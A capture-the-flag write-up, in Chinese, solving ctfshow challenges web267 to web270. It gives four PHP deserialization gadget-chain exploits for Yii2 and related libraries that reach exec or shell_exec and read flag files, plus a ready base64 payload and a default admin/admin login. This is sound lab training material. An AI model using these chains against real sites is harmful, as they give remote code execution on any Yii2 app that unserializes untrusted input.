ctfshow web入门 php反序列化 web267--web270

web267

查看源代码发现这三个页面在这里插入图片描述
然后发现登录页面直接admin/admin登录成功

在这里插入图片描述
然后看到了

///backdoor/shell
unserialize(base64_decode($_GET['code']))

EXP

<?php 
namespace yii\rest{class IndexAction{public $checkAccess;public $id;public function __construct(){$this->checkAccess='exec';$this->id='cat /flag >3.txt';}}
}
namespace Faker{use yii\rest\IndexAction;class Generator{protected $formatters;public function __construct(){$this->formatters['close']=[new IndexAction(),'run'];}}
}
namespace yii\db{use Faker\Generator;class BatchQueryResult{private $_dataReader;public function __construct(){$this->_dataReader=new Generator();}}
}
namespace {use yii\db\BatchQueryResult;echo base64_encode(serialize(new BatchQueryResult()));
}
?>

传参GET:
?r=backdoor/shell&code=TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNToiRmFrZXJcR2VuZXJhdG9yIjoxOntzOjEzOiIAKgBmb3JtYXR0ZXJzIjthOjE6e3M6NToiY2xvc2UiO2E6Mjp7aTowO086MjA6InlpaVxyZXN0XEluZGV4QWN0aW9uIjoyOntzOjExOiJjaGVja0FjY2VzcyI7czo0OiJleGVjIjtzOjI6ImlkIjtzOjExOiJscyAvID4xLnR4dCI7fWk6MTtzOjM6InJ1biI7fX19fQ==
访问
http://08a2bbcd-9f38-4806-bf8d-902d04e4a1fc.challenge.ctf.show/1.txt

web268

一样的操作
EXP

<?php 
namespace yii\rest{class CreateAction{public $checkAccess;public $id;public function __construct(){$this->checkAccess='shell_exec';$this->id='cat /flags | tee 2.txt';//$this->id='ls / | tee 1.txt';}}
}
namespace Faker{use yii\rest\CreateAction;class Generator{protected $formatters;public function __construct(){$this->formatters['isRunning']=[new CreateAction(),'run'];}}
}
namespace Codeception\Extension{use Faker\Generator;class RunProcess{private $processes;public function __construct(){$this->processes=[new Generator()];}}
}
namespace {echo base64_encode((serialize(new Codeception\Extension\RunProcess())));
}
?>
忘记解释了shell_exec是一个用于在 shell 中执行命令，并返回输出的php系统函数
id='cat /flags | tee 2.txt';
我自己写的时候呢是写的'cat /flags >3.txt'但是这种并不会在屏幕上面显示不好
所以还是用管道符| 和 tee

web269

EXP

<?php 
namespace yii\rest{class CreateAction{public $checkAccess;public $id;public function __construct(){$this->checkAccess='shell_exec';$this->id='cat /flagsa | tee 2.txt';//$this->id='ls / | tee 1.txt';}}
}
namespace Faker{use yii\rest\CreateAction;class Generator{protected $formatters;public function __construct(){$this->formatters['render']=[new CreateAction(),'run'];}}
}
namespace phpDocumentor\Reflection\DocBlock\Tags{use Faker\Generator;class See{protected $description;public function __construct(){$this->description=new Generator();}}
}
namespace{use phpDocumentor\Reflection\DocBlock\Tags\See;class Swift_KeyCache_DiskKeyCache{private $keys=[];private $path;public function __construct(){$this->path=new See;$this->keys=array("axin"=>array("is"=>"handsome"));}}echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}
?>

web270

EXP

<?php
namespace yii\rest{class IndexAction{public $checkAccess;public $id;public function __construct(){$this->checkAccess='shell_exec';$this->id='cat /flagsaa | tee 2.txt';//$this->id='ls / | tee 1.txt';}}
}
namespace yii\web{use yii\rest\IndexAction;class DbSession{public $writeCallback;public function __construct(){$this->writeCallback=[new IndexAction(),'run'];}}
}
namespace yii\db{use yii\web\DbSession;class BatchQueryResult{private $_dataReader;public function __construct(){$this->_dataReader=new DbSession();}}
}
namespace {use yii\db\BatchQueryResult;echo base64_encode(serialize(new BatchQueryResult()));
}
?>